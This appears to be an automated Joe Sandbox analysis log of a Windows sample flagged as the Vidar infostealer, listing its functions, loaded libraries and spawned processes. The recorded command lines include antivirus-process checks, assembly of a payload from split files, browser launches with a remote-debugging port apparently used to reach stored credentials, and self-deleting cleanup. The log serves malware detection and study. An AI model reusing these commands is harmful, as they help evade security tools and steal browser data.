          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D22AD11_2_001D22AD
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F22A211_2_001F22A2
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001EC62411_2_001EC624
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020E87F11_2_0020E87F
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0025C8A411_2_0025C8A4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00242A0511_2_00242A05
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00206ADE11_2_00206ADE
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00238BFF11_2_00238BFF
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001ECD7A11_2_001ECD7A
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001FCE1011_2_001FCE10
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0020715911_2_00207159
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D924011_2_001D9240
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0026531111_2_00265311
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D96E011_2_001D96E0
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F170411_2_001F1704
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F1A7611_2_001F1A76
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001D9B6011_2_001D9B60
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F7B8B11_2_001F7B8B
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F1D2011_2_001F1D20
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F7DBA11_2_001F7DBA
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_001F1FE711_2_001F1FE7
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\424372\Fine.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: String function: 004062CF appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: String function: 001F0DA0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: String function: 001EFD52 appears 40 times
          Source: mNPTwHOuvT.exeStatic PE information: invalid certificate
          Source: mNPTwHOuvT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 11.2.Fine.com.4310000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
          Source: mNPTwHOuvT.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9954628519492574
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/291@27/18
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_002441FA GetLastError,FormatMessageW,11_2_002441FA
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00232010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00232010
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00231A0B AdjustTokenPrivileges,CloseHandle,11_2_00231A0B
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_0023DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_0023DD87
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comCode function: 11_2_00243A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00243A0E
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DX903NAN.htmJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2018.tmpJump to behavior
          Source: mNPTwHOuvT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Fine.com, 0000000B.00000002.2938149780.0000000004284000.00000004.00000800.00020000.00000000.sdmp, HDTJW4E37.11.dr, 1VSRIWTJM.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: mNPTwHOuvT.exeVirustotal: Detection: 58%
          Source: mNPTwHOuvT.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeFile read: C:\Users\user\Desktop\mNPTwHOuvT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\mNPTwHOuvT.exe "C:\Users\user\Desktop\mNPTwHOuvT.exe"
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 424372
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SYDNEY" Webmasters
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\424372\Fine.com Fine.com U
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmdJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 424372Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SYDNEY" Webmasters Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\424372\Fine.com Fine.com UJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exitJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.comSection loaded: mswsock.dllJump to behavior
